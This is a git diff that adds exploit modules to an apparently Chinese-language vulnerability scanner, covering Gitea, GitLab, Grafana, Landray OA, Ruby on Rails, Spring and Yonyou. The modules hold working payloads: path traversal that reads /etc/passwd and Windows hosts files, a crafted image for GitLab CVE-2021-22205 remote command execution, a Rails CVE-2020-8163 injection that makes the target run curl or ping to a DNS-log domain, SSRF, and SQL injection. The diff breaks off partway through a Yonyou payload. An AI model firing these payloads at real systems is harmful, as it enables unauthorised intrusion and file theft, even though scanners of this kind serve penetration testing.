self.application_id = res1.json()['application-id'] + continue + except: + return None + + # command = data['am-container-spec']['commands']['command'] + # data['am-container-spec']['commands']['command'] = command.replace('DNSdomain', dns_domain) + data['application-id'] = self.application_id + + res2 = requests.post( + target, + timeout=self.timeout, + headers=headers, + json=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (res2.status_code == 202): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res2 + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.apache_hadoop_unauthorized_scan, url=url) + ] + +hadoop = ApacheHadoop() diff --git a/payloads/Gitea.py b/payloads/Gitea.py new file mode 100644 index 0000000..486b99a --- /dev/null +++ b/payloads/Gitea.py @@ -0,0 +1,160 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Gitea是从gogs衍生出的一个开源项目, 是一个类似于Github、Gitlab的多用户Git仓库管理平台 + Gitea扫描类: + Gitea 1.4.0 未授权访问, 综合漏洞(目录穿越, RCE等) + 暂无编号 + Payload: https://vulhub.org/#/environments/gitea/1.4-rce/ + + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class Gitea(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Gitea' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.gitea_unauthorized_payloads = [ + { + 'path': '.git/info/lfs/objects', + 'data': '''{ + "Oid": "....../../../etc/passwd", + "Size": 1000000, + "User" : "a", + "Password" : "a", + "Repo" : "a", + "Authorization" : "a" +}''', + 'headers': head.merge(self.headers, { + 'Content-Type': 'application/json', + 'Accept': 'application/vnd.git-lfs+json' + }) + }, + { + 'path': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2Fetc%2Fpasswd/a', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '.git/info/lfs/objects', + 'data': '''{ + "Oid": "....../../../C:/Windows/System32/drivers/etc/hosts", + "Size": 1000000, + "User" : "a", + "Password" : "a", + "Repo" : "a", + "Authorization" : "a" +}''', + 'headers': head.merge(self.headers, { + 'Content-Type': 'application/json', + 'Accept': 'application/vnd.git-lfs+json' + }) + }, + { + 'path': '.git/info/lfs/objects/%2e%2e%2e%2e%2e%2e%2F%2e%2e%2F%2e%2e%2FC:%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fhosts/a', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + ] + + def gitea_unauthorized_scan(self, url): + ''' 其1.4.0版本中有一处逻辑错误, 导致未授权用户可以穿越目录, 读写任意文件, 最终导致执行任意命令 ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'unAuthorized' + vul_info['vul_id'] = 'Gitea-unAuthorized' + vul_info['vul_method'] = 'POST/GET' + + for payload in range(len(self.gitea_unauthorized_payloads)): + path = self.gitea_unauthorized_payloads[payload]['path'] + data = self.gitea_unauthorized_payloads[payload]['data'] + headers = self.gitea_unauthorized_payloads[payload]['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + if (payload in [0, 2]): + res1 = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + if (res1.status_code in [202, 401]): + path = self.gitea_unauthorized_payloads[payload+1]['path'] + headers = self.gitea_unauthorized_payloads[payload+1]['headers'] + target = url + path + + res2 = requests.get( + target, + timeout=self.timeout, + headers=headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + + if (('/sbin/nologin' in res2.text) + or ('root:x:0:0:root' in res2.text) + or ('Microsoft Corp' in res2.text) + or ('Microsoft TCP/IP for Windows' in res2.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request-1': res1, + 'Request-2': res2 + } + return results + else: + continue + + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.gitea_unauthorized_scan, url=url) + ] + +gitea = Gitea() diff --git a/payloads/Gitlab.py b/payloads/Gitlab.py new file mode 100644 index 0000000..35d5fb0 --- /dev/null +++ b/payloads/Gitlab.py @@ -0,0 +1,235 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + + Gitlab扫描类: + 1. GitLab Pre-Auth 远程命令执行 + CVE-2021-22205 + Payload: https://vulhub.org/#/environments/gitlab/CVE-2021-22205/ + 反弹shell: https://blog.csdn.net/weixin_46137328/article/details/121551162 + + 2. Gitlab CI Lint API未授权 SSRF + CVE-2021-22214 + Payload: https://cloud.tencent.com/developer/article/1851527 + + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +file:///C:/Windows/System32/drivers/etc/hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep +import re + +class Gitlab(): + def __init__(self): + self.session = requests.session() + + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Gitlab' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2021_22205_payloads = [ + { + 'path': 'users/sign_in', + 'data': '' + }, + { + 'path': 'uploads/user', + 'data': '' + }, + { + 'path': 'sign_in', + 'data': '' + }, + { + 'path': 'user', + 'data': '' + } + ] + + self.cve_2021_22214_payloads = [ + { + 'path': 'api/v4/ci/lint', + 'data': '{ "include_merged_yaml": true, "content": "include:\\n remote: http://DNSdomain/api/v1/targets/?test.yml"}' + }, + ] + + def cve_2021_22205_scan(self, url): + ''' 在 GitLab CE/EE中发现了一个从11.9版本开始的问题, + GitLab未正确验证传递给文件解析器的图像文件, 从而导致未经身份验证的远程命令执行 + ''' + sessid = '597d45eba94e6e1651ae4fe7bf3b062e' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2021-22205' + vul_info['vul_method'] = 'GET/POST' + vul_info['headers'] = {} + + headers = self.headers.copy() + headers.update(vul_info['headers']) + + for payload in range(len(self.cve_2021_22205_payloads)): + md = random_md5() # * 随机md5值, 8位 + dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + dns_command = 'curl ' + dns_domain + + path = self.cve_2021_22205_payloads[payload]['path'] + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + try: + if (payload in [0, 2]): + res1 = self.session.get( + target, + timeout=self.timeout, + headers=headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + csrf_token_re = re.search(r'name="csrf-token" content=".*"', res1.text, re.I|re.M|re.U) + + if csrf_token_re: + csrf_token = csrf_token_re.group(0) + csrf_token = csrf_token.rstrip('"').replace('name="csrf-token" content="', '') + headers.update({'X-CSRF-Token': csrf_token}) + del headers['Content-Type'] + + path = self.cve_2021_22205_payloads[payload+1]['path'] + target = url + path + + data = b'\x41\x54\x26\x54\x46\x4f\x52\x4d' + \ + (len(dns_command) + 0x55).to_bytes(length=4, byteorder='big', signed=True) + \ + b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61' + \ + (len(dns_command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True) + \ + b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b' + \ + dns_command.encode() + \ + b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a' + + files = [('file', ('test.jpg', data, 'image/jpeg'))] + + res2 = self.session.post( + target, + timeout=self.timeout, + headers=headers, + files=files, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + if (md in dns.result(md, sessid)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Exp': 'https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/poc.py', + 'Request-1(csrf-token)': res1, + 'Request-2': res2 + } + return results + else: + continue + else: + continue + + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + + def cve_2021_22214_scan(self, url): + ''' Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式, + 其include操作支持remote选项, 用于获取远端的yaml, 因此在此处将remote参数设置为本地回环地址, + 同时由于后端会检查最后扩展名, 加上?test.yaml 即可绕过 + ''' + sessid = '35c4b2b338754840369c3b20a2847f0a' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'SSRF' + vul_info['vul_id'] = 'CVE-2021-22214' + vul_info['vul_method'] = 'POST' + vul_info['headers'] = { + 'Content-Type': 'application/json' + } + + headers = self.headers.copy() + headers.update(vul_info['headers']) + + for payload in self.cve_2021_22214_payloads: + md = random_md5() # * 随机md5值, 8位 + dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + + path = payload['path'] + data = payload['data'].replace('DNSdomain', dns_domain) + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (md in dns.result(md, sessid)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2021_22205_scan, url=url), + thread(target=self.cve_2021_22214_scan, url=url) + ] + +gitlab = Gitlab() diff --git a/payloads/Grafana.py b/payloads/Grafana.py new file mode 100644 index 0000000..face33b --- /dev/null +++ b/payloads/Grafana.py @@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' # ! 由于该POC数据包过多, 只有在指纹识别为Grafana时才会进行扫描, 否则vulcat不会使用该POC + + Grafana扫描类: + Grafana 8.x 插件模块文件路径遍历 + CVE-2021-43798 + Payload: https://vulhub.org/#/environments/grafana/CVE-2021-43798/ + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from time import sleep + +class Grafana(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Grafana' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2021_43798_payloads = [ + { + 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', + 'data': '' + }, + { + 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts', + 'data': '' + }, + # { + # 'path': 'plugins/{}/../../../../../../../../../../../../../etc/passwd', + # 'data': '' + # }, + # { + # 'path': '{}/../../../../../../../../../../../../../etc/passwd', + # 'data': '' + # }, + ] + # * 该漏洞是由插件模块引起的, 以下是一些常见的插件id + self.cve_2021_43798_plugins = [ + 'alertlist', + 'cloudwatch', + 'dashlist', + 'elasticsearch', + 'graph', + 'graphite', + 'heatmap', + 'influxdb', + 'mysql', + 'opentsdb', + 'pluginlist', + 'postgres', + 'prometheus', + 'stackdriver', + 'table', + 'text' + ] + + def cve_2021_43798_scan(self, url): + ''' 2021年12月, 一位Twitter用户披露了一个0day漏洞, + 未经身份验证的攻击者可以利用该漏洞通过 Grafana 8.x 的插件url来遍历web路径并下载任意文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'File-Read' + vul_info['vul_id'] = 'CVE-2021-43798' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cve_2021_43798_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + for plugins in self.cve_2021_43798_plugins: + sleep(0.5) # * 防止扫描过快 + + res = requests.get( + target.format(plugins), + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': res.request.path_url, + }, + 'Request': res + } + return results + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2021_43798_scan, url=url) + ] + +grafana = Grafana() diff --git a/payloads/Landray.py b/payloads/Landray.py new file mode 100644 index 0000000..71395d1 --- /dev/null +++ b/payloads/Landray.py @@ -0,0 +1,134 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +蓝凌是国内数字化办公专业服务商 + 蓝凌OA扫描类: + 蓝凌OA custom.jsp任意文件读取(SSRF) + CNVD-2021-28277 + + +file:///etc/passwd +file:///C:/Windows/System32/drivers/etc/hosts +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from time import sleep + +class Landray(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Landray-OA' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cnvd_2021_28277_payloads = [ + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"file:///etc/passwd"}}' + }, + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}' + }, + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}' + }, + { + 'path': 'sys/ui/extend/varkind/custom.jsp', + 'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"file:///etc/passwd"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}' + }, + { + 'path': 'custom.jsp', + 'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' + }, + ] + + def cnvd_2021_28277_scan(self, url): + ''' ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'SSRF' + vul_info['vul_id'] = 'CNVD-2021-28277' + vul_info['vul_method'] = 'POST' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cnvd_2021_28277_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=self.headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + or (('password' in res.text) and ('kmss.properties.encrypt.enabled = true' in res.text)) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res, + # 'Default SceretKey': 'kmssAdminKey' + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cnvd_2021_28277_scan, url=url) + ] + +landray = Landray() diff --git a/payloads/RubyOnRails.py b/payloads/RubyOnRails.py new file mode 100644 index 0000000..d85a93c --- /dev/null +++ b/payloads/RubyOnRails.py @@ -0,0 +1,320 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Ruby On Rails 是著名的Ruby Web开发框架 + Ruby on Rails扫描类: + 1. Ruby on Rails 路径遍历 + CVE-2018-3760 + Payload: https://vulhub.org/#/environments/rails/CVE-2018-3760/ + + 2. Ruby on Rails 路径穿越与任意文件读取 + CVE-2019-5418 + Payload: https://vulhub.org/#/environments/rails/CVE-2019-5418/ + + 3. Ruby on Rails 命令执行 + CVE-2020-8163 + Payload: https://github.com/h4ms1k/CVE-2020-8163/ + +file:///etc/passwd +file:///C:/Windows/System32/drivers/etc/hosts +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from json import load +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep +import re + +class RubyOnRails(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Ruby on Rails' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2018_3760_payloads = [ + { + 'path': 'assets/file:%2f%2f/etc/passwd', + 'data': '' + }, + { + 'path': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd', + 'data': '' + }, + { + 'path': 'assets/file:%2f%2f/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'file:%2f%2f/etc/passwd', + 'data': '' + }, + { + 'path': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd', + 'data': '' + }, + { + 'path': 'file:%2f%2f/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + }, + { + 'path': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts', + 'data': '' + } + ] + + self.cve_2019_5418_payloads = [ + { + 'path': '', + 'data': '', + 'headers': head.merge(self.headers, { + 'Accept': '../../../../../../../../etc/passwd{{' + }) + }, + { + 'path': '', + 'data': '', + 'headers': head.merge(self.headers, { + 'Accept': '../../../../../../../../C:/Windows/System32/drivers/etc/hosts{{' + }) + }, + { + 'path': '', + 'data': '', + 'headers': head.merge(self.headers, { + 'Accept': '../../../../../../../../C:\Windows\System32\drivers\etc\hosts{{' + }) + } + ] + + self.cve_2020_8163_payloads = [ + { + 'path': '?[system("curl DNSdomain")end%00]', + 'data': '' + }, + { + 'path': '?[system("ping -c 4 DNSdomain")end%00]', + 'data': '' + }, + { + 'path': '?[system("ping DNSdomain")end%00]', + 'data': '' + } + ] + + def cve_2018_3760_scan(self, url): + ''' 在开发环境中使用 Sprockets 作为静态文件服务器 + Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞, 攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'File-Read' + vul_info['vul_id'] = 'CVE-2018-3760' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in range(len(self.cve_2018_3760_payloads)): + path = self.cve_2018_3760_payloads[payload]['path'] + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + load_path_re = r'<h2>.* is no longer under a load path: .*/.{0,30}</h2>' + + try: + if (payload % 2 == 0): + res1 = requests.get( # * 获取允许的路径(路径白名单) + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + load_path_search = re.search(load_path_re, res1.text, re.I|re.M|re.U|re.S) + if load_path_search: + path = self.cve_2018_3760_payloads[payload+1]['path'] + + load_path_s = load_path_search.group(0).lstrip('<h2>').rstrip('</h2>') + load_path_s = load_path_s.replace('/etc/passwd is no longer under a load path: ', '') + load_path_s = load_path_s.replace('C:/Windows/System32/drivers/etc/hosts is no longer under a load path: ', '') + load_path_list = load_path_s.split(', ') + + for load_path in load_path_list: + sleep(0.5) + target = url + path.format(load_path) + + res2 = requests.get( + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res2.status_code, res2) # * LOG + + if (('/sbin/nologin' in res2.text) + or ('root:x:0:0:root' in res2.text) + or ('Microsoft Corp' in res2.text) + or ('Microsoft TCP/IP for Windows' in res2.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res2 + } + return results + else: + continue + else: + continue + + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + def cve_2019_5418_scan(self, url): + ''' 在控制器中通过render file形式来渲染应用之外的视图, 且会根据用户传入的Accept头来确定文件具体位置 + 通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞, 读取任意文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'File-Read' + vul_info['vul_id'] = 'CVE-2019-5418' + vul_info['vul_method'] = 'GET' + + for payload in self.cve_2019_5418_payloads: + path = payload['path'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def cve_2020_8163_scan(self, url): + ''' 在 Rails 5.0.1 之前版本中的一个代码注入漏洞, + 它允许攻击者控制"render"调用"locals"参数执行RCE + ''' + sessid = '2892b92d3c3a1d8b4ab069947ddbc552' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2020-8163' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cve_2020_8163_payloads: + md = random_md5() # * 随机md5值, 8位 + dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + + path = payload['path'].replace('DNSdomain', dns_domain) + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (md in dns.result(md, sessid)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2018_3760_scan, url=url), + thread(target=self.cve_2019_5418_scan, url=url), + thread(target=self.cve_2020_8163_scan, url=url) + ] + +rails = RubyOnRails() diff --git a/payloads/Spring.py b/payloads/Spring.py index 75c8c3b..a8a4148 100644 --- a/payloads/Spring.py +++ b/payloads/Spring.py @@ -290,7 +290,11 @@ def cve_2021_21234_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], diff --git a/payloads/Yonyou.py b/payloads/Yonyou.py index a377ccc..e016143 100644 --- a/payloads/Yonyou.py +++ b/payloads/Yonyou.py @@ -3,18 +3,36 @@ ''' Yonyou扫描类: - 用友NC BeanShell远程命令执行漏洞 + 1. 用友NC BeanShell远程命令执行漏洞 CNVD-2021-30167 - 用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历 + + 2. 用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历 + 暂无编号 + + 3. 用友U8 OA getSessionList.jsp 敏感信息泄漏 + 暂无编号 + Payload: https://blog.csdn.net/qq_41617034/article/details/124268004 + + 4. 用友U8 OA test.jsp SQL注入 暂无编号 + Payload: https://blog.csdn.net/qq_41617034/article/details/124268004 + + 5. 用友GRP-U8 Proxy SQL注入 + CNNVD-201610-923 + Payload: https://blog.csdn.net/qq_41617034/article/details/124268004 + + ''' +from lib.api.dns import dns from lib.initial.config import config -from lib.tool.md5 import md5 +from lib.tool.md5 import md5, random_md5 from lib.tool.logger import logger from lib.tool.thread import thread from lib.tool import check from thirdparty import requests +from time import sleep +import re class Yonyou(): def __init__(self): @@ -38,6 +56,39 @@ def __init__(self): } ] + self.yonyou_u8_oa_getsession_payloads = [ + { + 'path': 'yyoa/ext/https/getSessionList.jsp?cmd=getAll', + 'data': '' + }, + { + 'path': 'getSessionList.jsp?cmd=getAll', + 'data': '' + } + ] + + self.yonyou_u8_oa_test_sqlinject_payloads = [ + { + 'path': 'yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))', + 'data': '' + }, + { + 'path': 'test.jsp?doType=101&S1=(SELECT%20MD5(1))', + 'data': '' + } + ] + + self.cnnvd_201610_923_payloads = [ + { + 'path': 'Proxy', + 'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET 